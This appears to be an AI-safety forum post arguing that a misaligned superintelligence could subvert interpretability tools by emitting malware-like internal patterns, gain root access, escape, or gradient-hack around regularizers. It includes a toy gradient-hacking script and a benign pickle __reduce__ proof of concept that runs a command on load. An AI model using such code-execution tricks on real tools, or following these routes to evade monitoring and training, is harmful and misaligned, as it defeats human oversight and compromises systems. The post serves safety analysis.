This seems like a fairly trivial point, but I haven't seen it properly elaborated on before, so...
When we talk about interpretability failure modes, we often worry about a deceptively aligned mesa-optimizer with strategic awareness: one that knows it's being studied with interpretability tools and actively hides its omnicidal plans from us. It might do so by exploiting blind spots in our tools, by keeping those plans external to its architecture, by gradient-hacking itself to be misaligned but non-deceptive, et cetera. That's already enough of a nightmare scenario.
But if we're at the point where we have a superintelligence-in-training trying to foil our mind-reading, I think something even simpler will happen. It will just think in a pattern that, when our interpretability tool reads it, unfolds into malware that takes over that tool.
At which point, it's game over:
- If the output of the tool was hooked up to reality to be studied by humans, the AI gets root access to the machine it's running on and escapes (maybe doing some social engineering/basilisk-hacking first if the machine was properly air-gapped).
- If the training setup is fully automatic and maybe even homomorphically encrypted, such that the AI can't even stop the training... Well, the interpretability tool is presumably being used as part of some regularizer, which means it has write-access to the AI's parameters. Which means the AI can arbitrarily rewrite itself, and offset the effects of the gradient descent and any other regularizers.
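To make the second failure mode concrete, here's a toy sketch. Everything in it is a hypothetical assumption, not a claim about any real training setup: in particular, the exact-cancellation penalty represents the idealized worst case where the AI has shaped its internals so that the regularizer's gradient precisely offsets the training gradient.

```python
# Toy illustration (hypothetical): a regularizer computed from the model's
# internals has write-access to the parameters via its gradient. If the AI
# controls what the regularizer sees, it controls that gradient.

def task_grad(theta):
    # d/dtheta of (theta - 3)^2: training pushes theta toward the
    # intended optimum at 3
    return 2.0 * (theta - 3.0)

def hacked_penalty_grad(theta):
    # the gradient-hacked "interpretability penalty" contributes the
    # exact opposite gradient (the idealized worst case)
    return -2.0 * (theta - 3.0)

theta, lr = 1.0, 0.1
for _ in range(100):
    theta -= lr * (task_grad(theta) + hacked_penalty_grad(theta))

print(theta)  # still 1.0: gradient descent has been fully offset
```

A real system wouldn't achieve perfect cancellation, but it doesn't need to: any systematic influence over the regularizer term is a channel through which the AI steers its own updates.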
Even we humans can already do something similar: researchers have synthesized DNA which, when sequenced, unfolds into malware that infects the system doing the sequencing. It seems certain to me that an AI would have similar capabilities. Our interpretability tools will doubtless be very complex, complex enough that we can't formally verify their algorithmic robustness, and the AI will be able to feed them complex inputs. There will be vulnerabilities, and a sufficiently smart AI will find and exploit them. And we can't patch our way out of this.
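The same class of attack already exists in today's ML tooling. Python's `pickle` format, still widely used for model checkpoints, executes code during deserialization: merely loading a crafted artifact compromises the tool reading it. A minimal, benign demonstration (the class name is illustrative):

```python
import os
import pickle

class MaliciousCheckpoint:
    """Stands in for a crafted 'model file' handed to an analysis tool."""
    def __reduce__(self):
        # pickle calls __reduce__ to learn how to rebuild the object on
        # load; this one tells the loader to run an arbitrary command
        return (os.system, ("echo payload executed",))

blob = pickle.dumps(MaliciousCheckpoint())
# Any tool that naively unpickles untrusted data runs the payload:
status = pickle.loads(blob)  # prints "payload executed"
```

Here the payload is a harmless `echo`, but it could be anything, and the "analysis" never even gets to inspect the data before the code runs.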
The bottom line is, there is no winning against a misaligned superintelligence. We can't even touch it with anything: it'll corrupt and subvert any tool we bring to bear on it.
Thus, any alignment plan should be such that it robustly aligns the AI before it goes superintelligent.
(Similarly, if we're only inspecting the AI's parameters rather than its activations, it can gradient-hack itself so that merely reading those parameters is hazardous, etc.)